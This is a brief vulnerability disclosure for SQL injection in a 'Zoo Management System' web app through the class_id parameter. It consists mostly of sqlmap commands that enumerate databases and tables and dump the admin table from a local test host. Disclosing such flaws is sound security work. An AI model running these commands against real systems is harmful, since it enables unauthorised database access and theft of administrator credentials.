Zoo Management System SQL Injection Description => sql injection at /animals?class_id=1 Injection Point http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 Exploit Exploit with Sqlmap python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -dbs python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -tables -D zoomanagement python3 sqlmap.py -u http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1 -columns -D zoomanagement -T admin -dump Vulnerable Code No filter class_id when inserting data to database